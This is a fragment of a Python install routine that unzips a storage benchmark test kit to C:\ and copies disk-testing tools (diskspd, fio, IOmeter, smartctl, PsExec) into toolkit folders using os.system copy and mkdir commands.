            return 0

    kit_location = kit_location
    if kit_location.endswith("\\"):
        kit_location = kit_location
    else:
        kit_location = kit_location + "\\"
    all_files = os.listdir(kit_location)
    count = 0
    tc_zip = ''
    for item in all_files:
        if item.endswith(".zip"):
            tc_zip = item
            count += 1
    if count == 0:
        print(
            "No test kit zip in the provided location, copy it and run the program again "
        )
        time.sleep(2)
        return 0
    must_list = [
        "diskspd.exe", 'diskspd.xsd', 'Dynamo.exe', 'fio.exe', 'IOmeter.exe',
        'PsExec64.exe', 'smartctl.exe', 'StorageTool.exe'
    ]
    #print(all_files)
    if list_cmp(must_list, all_files) != 1:
        print("Something is missing copy items before you move forward ")
        print(
            "Required : 'diskspd.exe', 'diskspd.xsd', 'Dynamo.exe', 'fio.exe', 'IOmeter.exe', 'PsExec64.exe', 'smartctl.exe', 'StorageTool.exe'"
        )

    # unzip Tc file in C:\
    #copyfile(kit_location + tc_zip , "C:")
    zip_ref = zipfile.ZipFile(kit_location + tc_zip, 'r')
    zip_ref.extractall("C:\\")

    # change directory and file permissions
    #change_permission()

    # copy psexec file to C:\TestControllerUserFiles\Binaries
    PsExec_src = kit_location + "PsExec64.exe"
    PsExec_dst = "C:\TestControllerUserFiles\Binaries"
    copy_cmd = "copy " + PsExec_src + " " + PsExec_dst
    os.system(copy_cmd)

    #create SMART directory
    if "SMART" in os.listdir("C:\ToolkitUserFiles\Binaries"):
        os.system(
            "powershell Remove-Item C:\ToolkitUserFiles\Binaries\SMART  -Recurse"
        )
    smart_cmd = "mkdir C:\ToolkitUserFiles\Binaries\SMART"
    os.system(smart_cmd)
    #copy smartctl and storagetool to smart directory
    smart_src = kit_location + "smartctl.exe"
    storage_src = kit_location + "StorageTool.exe"
    smart_dest = "C:\ToolkitUserFiles\Binaries\SMART"
    os.system("copy " + smart_src + " " + smart_dest)
    os.system("copy " + storage_src + " " + smart_dest)

    #create fio directory
    if "fio" in os.listdir("C:\ToolkitUserFiles\Binaries"):
        os.system(
            "powershell Remove-Item C:\ToolkitUserFiles\Binaries\\fio  -Recurse"
        )
    fio_cmd = "mkdir C:\ToolkitUserFiles\Binaries\\fio"
    os.system(fio_cmd)
    #copy fio
    fio_src = kit_location + "fio.exe"
    fio_dst = "C:\ToolkitUserFiles\Binaries\\fio"
    fio_cmd = "copy " + fio_src + " " + fio_dst
    os.system(fio_cmd)

    # create IOmeter directory
    if "Iometer" in os.listdir("C:\ToolkitUserFiles\Binaries"):
        os.system(
            "powershell Remove-Item C:\ToolkitUserFiles\Binaries\Iometer  -Recurse"
        )
    IOmeter_cmd = "mkdir C:\ToolkitUserFiles\Binaries\Iometer"
    os.system(IOmeter_cmd)
    # copy Iometer and dynamo to iomter directory
    iometer_src = kit_location + "IOmeter.exe"
    dynamo_src = kit_location + "Dynamo.exe"
    iometer_dest = "C:\ToolkitUserFiles\Binaries\Iometer"
    os.system("copy " + iometer_src + " " + iometer_dest)
    os.system("copy " + dynamo_src + " " + iometer_dest)

    # create DiskSpd directory
    if "DiskSpd" in os.listdir("C:\ToolkitUserFiles\Binaries"):
        os.system(
            "powershell Remove-Item C:\ToolkitUserFiles\Binaries\DiskSpd  -Recurse"
        )
    DiskSpd_cmd = "mkdir C:\ToolkitUserFiles\Binaries\DiskSpd"
    os.system(DiskSpd_cmd)
    # copy disksdp exe and xsd directory
    DiskSpd_src = kit_location + "diskspd.exe"
    DiskSpd_xsd_src = kit_location + "diskspd.xsd"
    DiskSpd_dest = "C:\ToolkitUserFiles\Binaries\DiskSpd"
    os.system("copy " + DiskSpd_src + " " + DiskSpd_dest)
    os.system("copy " + DiskSpd_xsd_src + " " + DiskSpd_dest)

    #copy json file to C:\Toolkituserfiles
    json_src = kit_location + "config.json"
    json_dst = "C:\ToolkitUserFiles"
    copy_cmd = "copy " + json_src + " " + json_dst
    os.system(copy_cmd)

    # copy the StartController file
    startfile_src = kit_location + "StartController.ps1"
    startfile_dest = "C:\ToolkitUserFiles"
    startfile_copy_cmd = "copy " + startfile_src + " " + startfile_dest
    os.system(startfile_copy_cmd)